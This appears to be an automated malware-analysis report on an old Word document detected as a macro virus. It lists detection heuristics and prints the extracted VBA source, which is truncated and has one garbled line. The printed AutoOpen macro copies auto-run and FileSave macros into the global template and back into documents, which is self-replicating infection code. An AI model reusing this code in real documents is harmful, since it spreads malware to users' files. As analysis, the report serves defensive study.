MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and AutoClose, which are indicative of older malware attempting to infect templates. The script attempts to copy these macros to the global template, suggesting an intent to achieve persistence and potentially spread to other documents. The presence of 'Wazzu' as a marker further supports the legacy macro virus classification.
Heuristics 5
-
ClamAV: Doc.Trojan.Muck-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Muck-3
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5687 bytes |
SHA-256: 056cdafe071f4217d7752e84ffe87c1cb0d6adba751e232947eaf089d5dfc1b2 |
|||
|
Detection
ClamAV:
Doc.Trojan.Muck-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Wazzu Virus Protection. Used to install the Autoexec macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoOpen", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoClose", "Global:AutoClose", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoNew", "Global:AutoNew", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoExit", "Global:AutoExit", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSave", "Global:FileSave", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSaveAs", "Global:FileSaveAs", ExecuteOnly
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", ExecuteOnly
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", ExecuteOnly
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", ExecuteOnly
WordBasic.MacroCopy "Global:AutoExit", WordBasic.[FileName$]() + ":AutoExit", ExecuteOnly
WordBasic.MacroCopy "Global:FileSave", WordBasic.[FileName$]() + ":FileSave", ExecuteOnly
WordBasic.MacroCopy "Global:FileSaveAs", WordBasic.[FileName$]() + ":FileSaveAs", ExecuteOnly
WordBasic.FileSaveAll 1
End Sub
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Installed to your NORMAL template as AutoClose to clean the prank macros from any documents that you open then close."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoClose.MAIN"
End Sub
Attribute VB_Name = "AutoNew"
Public Sub MAIN()
Attribute MAIN.VB_Description = "When creating a new document this macro shows the IMI toolbar, maximizes the document, and zooms to fit page width."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoNew.MAIN"
Dim IsThereAnIni$
Dim Win$
Dim Platform$
Dim TitleBox$
Dim Copyright$
Dim StartupScreen$
Dim x
Dim Checked
Rem MAXIMIZE And SHOW TOOLBAR
UM DRRmemorWordBasic.ViewToolbars Toolbar:="IMI", Show:=1
WordBasic.DocMaximize 1
WordBasic.ViewZoom AutoFit:=1
On Error Resume Next
Rem MAKE INFOMAP.INI If IT DOES Not EXIST
IsThereAnIni$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")
If IsThereAnIni$ = "" Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "On", "InfoMap.ini"
Rem DETERMINE PLATFORM For VERSION DISPLAY
Win$ = WordBasic.[GetSystemInfo$](21)
If Win$ = "Windows" Then Platform$ = "Windows" Else Platform$ = "Macintosh"
TitleBox$ = "Version 1.2 for " + Platform$
Copyright$ = "© 1994, Information Mapping, Inc., Waltham, MA. All rights reserved."
Rem SET UP DIALOG BOX
WordBasic.BeginDialog 590, 269, TitleBox$
WordBasic.Picture 13, 6, 567, 211, "LOGO", 1, "Picture1"
WordBasic.Text 19, 251, 550, 13, Copyright$, "Text1"
WordBasic.OKButton 416, 218, 88, 21
WordBasic.CheckBox 25, 224, 236, 16, "Disable this startup screen.", "CheckBox1"
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
WordBasic.CurValues.UserDialog dlg
StartupScreen$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")
If StartupScreen$ = "On" Then x = WordBasic.Dialog.UserDialog(dlg)
Checked = dlg.CheckBox1
If Checked = 1 Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "Off", "InfoMap.ini"
End Sub
Attribute VB_Name = "FileSave"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.FileSave
WordBasic.FileSa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.